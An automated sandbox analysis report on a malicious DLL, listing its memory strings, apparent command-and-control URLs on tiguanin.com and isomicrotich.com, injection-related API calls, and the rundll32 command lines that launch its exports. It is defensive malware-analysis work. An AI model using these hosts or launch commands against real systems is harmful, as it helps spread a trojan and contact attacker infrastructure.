                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/a
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/&
                  Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/H
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/T
                  Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/a
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/ons
                  Source: explorer.exe, 0000001E.00000002.2586707212.000000000841D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/zi
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/0
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/;
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/E
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/N
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpA
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpN
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpW
                  Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpte
                  Source: rundll32.exe, 00000017.00000002.2575784572.0000029F39CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpk
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpn
                  Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/in.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/in.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/net.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/p
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000001E.00000000.1578935505.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.2292493778.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_81e4c7c7-f
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_afbc3cd5-b
                  Source: Yara matchFile source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DD9FE NtOpenFile,23_3_0000029F3B7DD9FE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DDACE NtReadFile,23_3_0000029F3B7DDACE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DD98E NtAllocateVirtualMemory,23_3_0000029F3B7DD98E
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DDA6E NtProtectVirtualMemory,23_3_0000029F3B7DDA6E
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F7A50 NtSetContextThread,23_2_0000029F3B8F7A50
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F55C0 NtClose,NtTerminateThread,23_2_0000029F3B8F55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9151C0 NtReadVirtualMemory,23_2_0000029F3B9151C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9145F0 NtDuplicateObject,23_2_0000029F3B9145F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E1600 NtClose,RtlExitUserThread,23_2_0000029F3B8E1600
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F8149 NtSetContextThread,23_2_0000029F3B8F8149
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E71B0 NtClose,23_2_0000029F3B8E71B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F8C60 NtClose,CreateFiber,DeleteFiber,23_2_0000029F3B8F8C60
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914FF0 NtQueueApcThread,23_2_0000029F3B914FF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914BE0 NtProtectVirtualMemory,23_2_0000029F3B914BE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B913F40 NtAllocateVirtualMemory,23_2_0000029F3B913F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914740 NtFreeVirtualMemory,23_2_0000029F3B914740
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914360 NtCreateThreadEx,23_2_0000029F3B914360
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose,23_2_0000029F3B8FF3A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E17B0 NtClose,23_2_0000029F3B8E17B0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D82B4 NtFreeVirtualMemory,30_2_089D82B4
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DB388 NtAllocateVirtualMemory,30_2_089DB388
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DC704 NtDelayExecution,30_2_089DC704
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D80B8 RtlInitUnicodeString,NtCreateFile,30_2_089D80B8
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D8240 NtClose,30_2_089D8240
                  Source: C:\Windows\explorer.exeCode function: 30_2_089E01A0 NtFreeVirtualMemory,30_2_089E01A0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D81C8 NtWriteFile,30_2_089D81C8
                  Source: C:\Windows\explorer.exeCode function: 30_2_089E0130 NtAllocateVirtualMemory,30_2_089E0130
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                  Source: classification engineClassification label: mal100.troj.evad.winDLL@28/25@5/3
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_00007DF49BA40000 CreateToolhelp32Snapshot,CloseHandle,23_3_00007DF49BA40000
                  Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7596
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7148
                  Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0d21df3-edb9-4c03-81a1-5896762c4e04
                  Source: vierm_soft_x64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
                  Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
                  Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: vierm_soft_x64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
